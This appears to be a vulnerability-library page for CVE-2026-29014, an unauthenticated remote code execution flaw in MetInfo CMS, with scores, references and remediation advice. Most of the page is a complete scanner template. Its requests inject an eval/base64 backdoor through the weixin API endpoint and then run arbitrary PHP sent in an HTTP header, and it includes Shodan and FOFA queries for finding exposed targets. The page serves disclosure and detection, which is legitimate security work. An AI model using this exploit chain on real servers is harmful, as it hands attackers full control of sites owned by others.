/Vulnerability Library

MetInfo CMS <= 8.1 - Remote Code Execution

CVE-2026-29014
Verified

Description

MetInfo CMS 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability caused by insufficient input neutralization in the execution path, letting remote attackers execute arbitrary code remotely, exploit requires crafted requests.

Severity

Critical

CVSS Score

9.8

Exploit Probability

28%

Published Date

April 6, 2026

Template Author

0x_akoko

CVE-2026-29014.yaml
id: CVE-2026-29014

info:
  name: MetInfo CMS <= 8.1 - Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
   MetInfo CMS 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability caused by insufficient input neutralization in the execution path, letting remote attackers execute arbitrary code remotely, exploit requires crafted requests.
  impact: |
   Remote attackers can execute arbitrary code, gaining full control over the affected server.
  remediation: |
   Update to the latest version beyond 8.1.
  reference:
    - https://karmainsecurity.com/KIS-2026-06
    - https://www.metinfo.cn
    - https://nvd.nist.gov/vuln/detail/CVE-2026-29014
  classification:
    cve-id: CVE-2026-29014
    epss-score: 0.27974
    epss-percentile: 0.96538
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    max-request: 3
    verified: true
    shodan-query: http.title:"MetInfo"
    fofa-query: app="MetInfo"
  tags: cve,cve2026,metinfo,rce,php,vkev

variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "MetInfo", "mituo")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        C: {{base64("echo {{num1}}*{{num2}};die();")}}

        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;Array</EventKey></x>

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains(body, "{{result}}")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402203e85b5c6e36b2443c073c92f81fd32e969e2c76a7746876b1dc2104886a204d30220640bcb4d3d4f552a6e9d602ba8d0bb52203a11e16e6464f3d61dedc0382971bc:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-29014
CWE ID:
cwe-94

References

https://karmainsecurity.com/KIS-2026-06https://www.metinfo.cnhttps://nvd.nist.gov/vuln/detail/CVE-2026-29014

Remediation Steps

Update to the latest version beyond 8.1.